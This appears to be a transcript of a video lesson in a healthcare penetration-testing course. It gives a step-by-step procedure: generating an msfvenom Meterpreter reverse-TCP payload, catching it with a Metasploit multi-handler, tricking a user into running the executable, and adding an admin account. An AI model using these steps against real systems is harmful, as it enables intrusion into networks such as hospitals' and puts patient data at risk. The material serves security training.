Welcome back to Penetration Testing for Healthcare. This will be our final installment. Healthcare System Issues, Section 4. In this section, we're going to have a look at privilege escalation. We're going to create some false links with XSS. We're going to sneak in with a Trojan. And lastly, we're going to end up with some tips and conclusions. For video 1, let's have a look at privilege escalation. Now think about privilege escalation here for a second. Why hassle to try and get in and create backdoors and do everything that goes above and beyond if you can just be admin and have access to everything, control everything, and wreak complete and utter havoc? So let's become an admin. So for this one, I want you to start up your Kali Linux and a Windows client. What we're going to do here is we are going to start again with an MSF Venom payload. It's going to be -P Windows Interpreter reverse TCP set lhost. Now remember, your lhost is equal to your IP address of your Kali machine. If you forgot what your IP is, open up a new window on your terminal and type ifconfig, and that's going to give you your IP address. Let's go back over here, and we're going to say 192.168.8.104, and I'm going to set the L port to 4457. I'm going to use a format of exe because it is a Windows host that I am attacking, and I want to save it in my Linux machine root directory desktop file.exe and enter. Wait for your payload to complete. Once your payload has completed, I want you to type MSF console and wait for Metasploit to open up. Once Metasploit is open up, let's just go and set a multi-handler. And you're going to do this by typing use exploit multi-handler and enter. From there, we just need to go and set the lhost, and the lhost is my Linux machine IP address, which is 192.168.8.104, and from there I want to set the L port to 4457, and I'm going to type run. We then need to go and set the payload, which is going to be set payload Windows Interpreter reverse TCP and enter. You can say show options, and you will see there that our lhost and lport is already set. Now we're going to say run. Now the reason we're saying run and not exploit is because we want it to basically run in the background. While it's like this, I want you to minimize, right click on your terminal and say new window. Once you have that open, type Python -m simple HTTP server 80 and enter. Now, because for demonstration purposes, yes, we are going to be bypassing so that we can access the admin account, but I'm going to access the server just so that I can get the information across to the other virtual machine. Just like previous times, I want you to open up your files, desktop, and copy that over onto your client's machine. Now remember, this can be done either via mail, flash drive, whatever the case may be, as long as the user takes it and double clicks on it. Now, because my IPs has changed since the last video, I just need to go and update the IP address so that it will actually work. Once you have access to that drive, just paste it into that directory. And there we go. Opening up, you will now find it in your shared directory. I'm just going to paste it onto my desktop. And I'm going to run the file. Obviously, nothing will happen because, quite frankly, the user doesn't know that it's an exploit. So the user is just going to think something went wrong and they're not going to bother any further. Have a look at your Kali machine. On Kali, you now have an open session. So basically, what we can do now is we can say run get GUI you, and this is going to create a user for you. Now let's go and create the user admin me, and I'm going to create a password. So it's good to be the admin. As long as you can get in and you can escalate those privileges, you can wreak absolute havoc, and that's what we need to close.